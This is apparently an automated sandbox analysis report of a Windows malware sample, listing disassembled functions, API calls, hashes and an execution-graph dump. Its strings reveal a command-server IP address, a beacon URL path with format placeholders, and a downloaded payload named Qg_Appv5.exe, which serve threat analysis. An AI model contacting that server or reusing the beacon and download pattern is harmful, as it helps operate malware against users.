                                                                                                                                                                                                                                                                                        • Instruction ID: edbdd7ebb8c5171918d03f37272a9e124c092f2c869cbbc06f3c8555867fd0d2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68e52b31ccd65e299d1839df556b82d3a44aaaaa4a1098e86e78dc1aaf3716b6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C21B071A21215DFE718EF68C840BA9B7F5FF88314F20C15ED8059B2C2DB70A905CB54
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00417217
                                                                                                                                                                                                                                                                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                                                                                                                                        • String ID: -@
                                                                                                                                                                                                                                                                                        • API String ID: 2279764990-2564449678
                                                                                                                                                                                                                                                                                        • Opcode ID: 159ffde8afdd61bab2c645bd26f6e363fc6904dc3b18735a3e366a8bdcbdbe8f
                                                                                                                                                                                                                                                                                        • Instruction ID: f4ec00a39f4fcae9ee9be6b99cea2ca8987fdb4a8322dd671adfd3fbebc4ff23
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 159ffde8afdd61bab2c645bd26f6e363fc6904dc3b18735a3e366a8bdcbdbe8f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65110A33A042205B9B369E19EC80ADB73B5EB847247164172FD29BB354DB34DCC2C6D9
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                                                                                                                                                        • String ID: /cpa/ping.php?substr=%s&s=ab&sub=%s$one
                                                                                                                                                                                                                                                                                        • API String ID: 3519838083-2876206925
                                                                                                                                                                                                                                                                                        • Opcode ID: 6ce4b3f3f3a476027b50502c85f5921e8b78a39e23d084b56ba9ef5ace9e0aba
                                                                                                                                                                                                                                                                                        • Instruction ID: 15a4cf94b989c4b5e0a43b8c54f1cb92ed8d46dd15ee7e513d2018d21c6c36cd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ce4b3f3f3a476027b50502c85f5921e8b78a39e23d084b56ba9ef5ace9e0aba
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB11C232A01014BBDB00AF89DC01BAEB779EF49314F40003EF805A3291D3799B5187A8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                                                                                                                                                        • String ID: /cpa/ping.php?substr=%s&s=ab&sub=%s$one
                                                                                                                                                                                                                                                                                        • API String ID: 3519838083-2876206925
                                                                                                                                                                                                                                                                                        • Opcode ID: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
                                                                                                                                                                                                                                                                                        • Instruction ID: 58cad69bb64099602b8576d1189b9b62e2cba9be08d4292d9ac7a8c444cb5c6d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D11C272710115BBE7059F98CC40AAEB7B9FF49714F008129F804E7292D371AA5087A1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                                                                                                                                                        • std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
                                                                                                                                                                                                                                                                                          • Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                                                        • String ID: T*@
                                                                                                                                                                                                                                                                                        • API String ID: 4198646248-2370032326
                                                                                                                                                                                                                                                                                        • Opcode ID: d0f7d386ae4efe2390fbf90dfbd3daa7514f827ed2e8e8cb20172591b6377ab5
                                                                                                                                                                                                                                                                                        • Instruction ID: dd23321e4c46181b40e5f98da61592ca99a58c04279906981af05f8f2703ec12
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0f7d386ae4efe2390fbf90dfbd3daa7514f827ed2e8e8cb20172591b6377ab5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2321B0B5A00A06AFC305CF6AD581995FBF4FF48314B40826FE80987B50E774B924CFA4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00404373
                                                                                                                                                                                                                                                                                          • Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47
                                                                                                                                                                                                                                                                                        • __Getcoll.LIBCPMT ref: 004043CF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog$Getcoll
                                                                                                                                                                                                                                                                                        • String ID: u@@
                                                                                                                                                                                                                                                                                        • API String ID: 206117190-736001340
                                                                                                                                                                                                                                                                                        • Opcode ID: 457c0db2275d5d41219090803dc9521f21b1157a3f189203d6fa5eb114c840f9
                                                                                                                                                                                                                                                                                        • Instruction ID: c779ab9f98323ff8677db40664eca0c2ffeff6dd5383222ff5ea7a01e0671416
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 457c0db2275d5d41219090803dc9521f21b1157a3f189203d6fa5eb114c840f9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 871170B19012099FCB04EFA9C581A9DF7B4FF44304F10847FE545BB281DB789A44CB95
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                                                                                                                                                        • String ID: [vB$ios_base::failbit set
                                                                                                                                                                                                                                                                                        • API String ID: 3519838083-2429468811
                                                                                                                                                                                                                                                                                        • Opcode ID: 7f09e6f22c187b78d4661f81628029d25d5b8f4a86949919d9877c3638318d4b
                                                                                                                                                                                                                                                                                        • Instruction ID: ab704284c91e3e138bf687fc79a9779b2e9cfaa6e32b5170fe2e18da97776256
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f09e6f22c187b78d4661f81628029d25d5b8f4a86949919d9877c3638318d4b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA01B172610109DFDB04DF58C444BFDBBF8EF49318F14815AE401A7251D7B56E45CBA4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00002000,?,?,/1/Qg_Appv5.exe,00425B8E,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426324
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: PathTemp
                                                                                                                                                                                                                                                                                        • String ID: /1/Qg_Appv5.exe$Qg_Appv5.exe
                                                                                                                                                                                                                                                                                        • API String ID: 2920410445-1161945460
                                                                                                                                                                                                                                                                                        • Opcode ID: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                                                                        • Instruction ID: d0e7d276ca818b5a52dc3a1143c2d6cc19e203c39cc505e05bbffc3e6100e946
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17E026123088110A5F29482D3818AAFDF03DFD261038582AAD88307345CD410C0BD2B0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00002000,?,?,/1/Qg_Appv5.exe,04225DF5,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0422658B
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: PathTemp
                                                                                                                                                                                                                                                                                        • String ID: /1/Qg_Appv5.exe$Qg_Appv5.exe
                                                                                                                                                                                                                                                                                        • API String ID: 2920410445-1161945460
                                                                                                                                                                                                                                                                                        • Opcode ID: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                                                                        • Instruction ID: 911cbcbcfc080ed27fe2f6512a62b5be9599a0ebcd8a2bf74d7d4680efd8aa5b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CFE07D133048131A5F3D0C2A3C19ABBDF03DFC7550348C2AAD88307249CD412C0BD2B0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A893
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A8A1
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A8FC
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b4f25852fafc3cb0f15b20596d9ae719c618a575aca992b75c45ceb5274d71e6
                                                                                                                                                                                                                                                                                        • Instruction ID: ef74c1d6368c920b9f03e6eff6a6fb43ae41f0a69c5039c94680ed31baa92590
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4f25852fafc3cb0f15b20596d9ae719c618a575aca992b75c45ceb5274d71e6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D410770602206AFCB219F65C844AEF7BA4AF01310F16456FED599B291DB388CE2C75A
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0421AAFA
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0421AB08
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0421AB63
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2fe2766fc0ccf28db447755f4ca5e52f9ac34e5cb848ceccec86b5a16212b3b4
                                                                                                                                                                                                                                                                                        • Instruction ID: 697364eadc88d5f5a797056cb768f62e68fc4e868a0050957fb1e5f48be77d47
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fe2766fc0ccf28db447755f4ca5e52f9ac34e5cb848ceccec86b5a16212b3b4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C541E830722287AFDB218F64C844F7A7BE6AF31310F154169E959A71F1DB74AA01C750
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                        Execution Coverage:5.6%
                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                        Signature Coverage:2.4%
                                                                                                                                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:42
59083 403864 59082->59083 59084 4043b0 2 API calls 59083->59084 59085 40387d 59084->59085 59086 4043b0 2 API calls 59085->59086 59087 403896 59086->59087 59088 4043b0 2 API calls 59087->59088 59089 4038af 59088->59089 59090 4043b0 2 API calls 59089->59090 59091 4038c8 59090->59091 59092 4043b0 2 API calls 59091->59092 59093 4038e1 59092->59093 59094 4043b0 2 API calls 59093->59094 59095 4038fa 59094->59095 59096 4043b0 2 API calls 59095->59096 59097 403913 59096->59097 59098 4043b0 2 API calls 59097->59098 59099 40392c 59098->59099 59100 4043b0 2 API calls 59099->59100 59101 403945 59100->59101 59102 4043b0 2 API calls 59101->59102 59103 40395e 59102->59103 59104 4043b0 2 API calls 59103->59104 59105 403977 59104->59105 59106 4043b0 2 API calls 59105->59106 59107 403990 59106->59107 59108 4043b0 2 API calls 59107->59108 59109 4039a9 59108->59109 59110 4043b0 2 API calls 59109->59110 59111 4039c2 59110->59111 59112 4043b0 2 API calls 59111->59112 59113 4039db 59112->59113 59114 4043b0 2 API calls 59113->59114 59115 4039f4 59114->59115 59116 4043b0 2 API calls 59115->59116 59117 403a0d 59116->59117 59118 4043b0 2 API calls 59117->59118 59119 403a26 59118->59119 59120 4043b0 2 API calls 59119->59120 59121 403a3f 59120->59121 59122 4043b0 2 API calls 59121->59122 59123 403a58 59122->59123 59124 4043b0 2 API calls 59123->59124 59125 403a71 59124->59125 59126 4043b0 2 API calls 59125->59126 59127 403a8a 59126->59127 59128 4043b0 2 API calls 59127->59128 59129 403aa3 59128->59129 59130 4043b0 2 API calls 59129->59130 59131 403abc 59130->59131 59132 4043b0 2 API calls 59131->59132 59133 403ad5 59132->59133 59134 4043b0 2 API calls 59133->59134 59135 403aee 59134->59135 59136 4043b0 2 API calls 59135->59136 59137 403b07 59136->59137 59138 4043b0 2 API calls 59137->59138 59139 403b20 59138->59139 59140 4043b0 2 API calls 59139->59140 59141 403b39 59140->59141 59142 4043b0 2 API calls 59141->59142 59143 403b52 59142->59143 59144 4043b0 2 API calls 59143->59144 59145 403b6b 
59144->59145 59146 4043b0 2 API calls 59145->59146 59147 403b84 59146->59147 59148 4043b0 2 API calls 59147->59148 59149 403b9d 59148->59149 59150 4043b0 2 API calls 59149->59150 59151 403bb6 59150->59151 59152 4043b0 2 API calls 59151->59152 59153 403bcf 59152->59153 59154 4043b0 2 API calls 59153->59154 59155 403be8 59154->59155 59156 4043b0 2 API calls 59155->59156 59157 403c01 59156->59157 59158 4043b0 2 API calls 59157->59158 59159 403c1a 59158->59159 59160 4043b0 2 API calls 59159->59160 59161 403c33 59160->59161 59162 4043b0 2 API calls 59161->59162 59163 403c4c 59162->59163 59164 4043b0 2 API calls 59163->59164 59165 403c65 59164->59165 59166 4043b0 2 API calls 59165->59166 59167 403c7e 59166->59167 59168 4043b0 2 API calls 59167->59168 59169 403c97 59168->59169 59170 4043b0 2 API calls 59169->59170 59171 403cb0 59170->59171 59172 4043b0 2 API calls 59171->59172 59173 403cc9 59172->59173 59174 4043b0 2 API calls 59173->59174 59175 403ce2 59174->59175 59176 4043b0 2 API calls 59175->59176 59177 403cfb 59176->59177 59178 4043b0 2 API calls 59177->59178 59179 403d14 59178->59179 59180 4043b0 2 API calls 59179->59180 59181 403d2d 59180->59181 59182 4043b0 2 API calls 59181->59182 59183 403d46 59182->59183 59184 4043b0 2 API calls 59183->59184 59185 403d5f 59184->59185 59186 4043b0 2 API calls 59185->59186 59187 403d78 59186->59187 59188 4043b0 2 API calls 59187->59188 59189 403d91 59188->59189 59190 4043b0 2 API calls 59189->59190 59191 403daa 59190->59191 59192 4043b0 2 API calls 59191->59192 59193 403dc3 59192->59193 59194 4043b0 2 API calls 59193->59194 59195 403ddc 59194->59195 59196 4043b0 2 API calls 59195->59196 59197 403df5 59196->59197 59198 4043b0 2 API calls 59197->59198 59199 403e0e 59198->59199 59200 4043b0 2 API calls 59199->59200 59201 403e27 59200->59201 59202 4043b0 2 API calls 59201->59202 59203 403e40 59202->59203 59204 4043b0 2 API calls 59203->59204 59205 403e59 59204->59205 59206 4043b0 2 API calls 59205->59206 59207 403e72 59206->59207 
59208 4043b0 2 API calls 59207->59208 59209 403e8b 59208->59209 59210 4043b0 2 API calls 59209->59210 59211 403ea4 59210->59211 59212 4043b0 2 API calls 59211->59212 59213 403ebd 59212->59213 59214 4043b0 2 API calls 59213->59214 59215 403ed6 59214->59215 59216 4043b0 2 API calls 59215->59216 59217 403eef 59216->59217 59218 4043b0 2 API calls 59217->59218 59219 403f08 59218->59219 59220 4043b0 2 API calls 59219->59220 59221 403f21 59220->59221 59222 4043b0 2 API calls 59221->59222 59223 403f3a 59222->59223 59224 4043b0 2 API calls 59223->59224 59225 403f53 59224->59225 59226 4043b0 2 API calls 59225->59226 59227 403f6c 59226->59227 59228 4043b0 2 API calls 59227->59228 59229 403f85 59228->59229 59230 4043b0 2 API calls 59229->59230 59231 403f9e 59230->59231 59232 4043b0 2 API calls 59231->59232 59233 403fb7 59232->59233 59234 4043b0 2 API calls 59233->59234 59235 403fd0 59234->59235 59236 4043b0 2 API calls 59235->59236 59237 403fe9 59236->59237 59238 4043b0 2 API calls 59237->59238 59239 404002 59238->59239 59240 4043b0 2 API calls 59239->59240 59241 40401b 59240->59241 59242 4043b0 2 API calls 59241->59242 59243 404034 59242->59243 59244 4043b0 2 API calls 59243->59244 59245 40404d 59244->59245 59246 4043b0 2 API calls 59245->59246 59247 404066 59246->59247 59248 4043b0 2 API calls 59247->59248 59249 40407f 59248->59249 59250 4043b0 2 API calls 59249->59250 59251 404098 59250->59251 59252 4043b0 2 API calls 59251->59252 59253 4040b1 59252->59253 59254 4043b0 2 API calls 59253->59254 59255 4040ca 59254->59255 59256 4043b0 2 API calls 59255->59256 59257 4040e3 59256->59257 59258 4043b0 2 API calls 59257->59258 59259 4040fc 59258->59259 59260 4043b0 2 API calls 59259->59260 59261 404115 59260->59261 59262 4043b0 2 API calls 59261->59262 59263 40412e 59262->59263 59264 4043b0 2 API calls 59263->59264 59265 404147 59264->59265 59266 4043b0 2 API calls 59265->59266 59267 404160 59266->59267 59268 4043b0 2 API calls 59267->59268 59269 404179 59268->59269 59270 4043b0 2 
API calls 59269->59270 59271 404192 59270->59271 59272 4043b0 2 API calls 59271->59272 59273 4041ab 59272->59273 59274 4043b0 2 API calls 59273->59274 59275 4041c4 59274->59275 59276 4043b0 2 API calls 59275->59276 59277 4041dd 59276->59277 59278 4043b0 2 API calls 59277->59278 59279 4041f6 59278->59279 59280 4043b0 2 API calls 59279->59280 59281 40420f 59280->59281 59282 4043b0 2 API calls 59281->59282 59283 404228 59282->59283 59284 4043b0 2 API calls 59283->59284 59285 404241 59284->59285 59286 4043b0 2 API calls 59285->59286 59287 40425a 59286->59287 59288 4043b0 2 API calls 59287->59288 59289 404273 59288->59289 59290 4043b0 2 API calls 59289->59290 59291 40428c 59290->59291 59292 4043b0 2 API calls 59291->59292 59293 4042a5 59292->59293 59294 4043b0 2 API calls 59293->59294 59295 4042be 59294->59295 59296 4043b0 2 API calls 59295->59296 59297 4042d7 59296->59297 59298 4043b0 2 API calls 59297->59298 59299 4042f0 59298->59299 59300 4043b0 2 API calls 59299->59300 59301 404309 59300->59301 59302 4043b0 2 API calls 59301->59302 59303 404322 59302->59303 59304 4043b0 2 API calls 59303->59304 59305 40433b 59304->59305 59306 4043b0 2 API calls 59305->59306 59307 404354 59306->59307 59308 4043b0 2 API calls 59307->59308 59309 40436d 59308->59309 59310 4043b0 2 API calls 59309->59310 59311 404386 59310->59311 59312 4043b0 2 API calls 59311->59312 59313 40439f 59312->59313 59314 416240 59313->59314 59315 416250 43 API calls 59314->59315 59316 416666 8 API calls 59314->59316 59315->59316 59317 416776 59316->59317 59318 4166fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59316->59318 59319 416783 8 API calls 59317->59319 59320 416846 59317->59320 59318->59317 59319->59320 59321 4168c8 59320->59321 59322 41684f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59320->59322 59323 4168d5 6 API calls 59321->59323 59324 416967 59321->59324 59322->59321 59323->59324 59325 416974 9 API calls 59324->59325 59326 416a4f 
59324->59326 59325->59326 59327 416ad2 59326->59327 59328 416a58 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59326->59328 59329 416adb GetProcAddress GetProcAddress 59327->59329 59330 416b0c 59327->59330 59328->59327 59329->59330 59331 416b45 59330->59331 59332 416b15 GetProcAddress GetProcAddress 59330->59332 59333 416b52 8 API calls 59331->59333 59334 416c15 59331->59334 59332->59331 59333->59334 59335 416c7f 59334->59335 59336 416c1e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59334->59336 59337 416ca1 59335->59337 59338 416c88 GetProcAddress 59335->59338 59336->59335 59339 412cc6 59337->59339 59340 416caa GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59337->59340 59338->59337 59339->58524 59340->59339 59342 4141f0 GetVolumeInformationA 59341->59342 59343 4141e9 59341->59343 59344 41422e 59342->59344 59343->59342 59345 414299 GetProcessHeap HeapAlloc 59344->59345 59346 4142c5 wsprintfA 59345->59346 59347 4142b6 59345->59347 59349 416d40 lstrcpy 59346->59349 59348 416d40 lstrcpy 59347->59348 59350 412d94 59348->59350 59349->59350 59350->58544 59352 416da0 lstrcpy 59351->59352 59353 404559 59352->59353 60371 404470 59353->60371 59355 404565 59356 416d40 lstrcpy 59355->59356 59357 404597 59356->59357 59358 416d40 lstrcpy 59357->59358 59359 4045a4 59358->59359 59360 416d40 lstrcpy 59359->59360 59361 4045b1 59360->59361 59362 416d40 lstrcpy 59361->59362 59363 4045be 59362->59363 59364 416d40 lstrcpy 59363->59364 59365 4045cb InternetOpenA StrCmpCA 59364->59365 59366 404604 59365->59366 59367 404b8b InternetCloseHandle 59366->59367 60383 415260 59366->60383 59369 404ba8 59367->59369 60398 4094a0 CryptStringToBinaryA 59369->60398 59370 404623 60391 416f20 59370->60391 59374 404636 59375 416ea0 lstrcpy 59374->59375 59380 40463f 59375->59380 59376 416e20 2 API calls 59377 404bc5 59376->59377 59378 416fb0 4 API calls 59377->59378 59381 404bdb 59378->59381 59379 404be7 moneypunct 59383 416da0 lstrcpy 59379->59383 
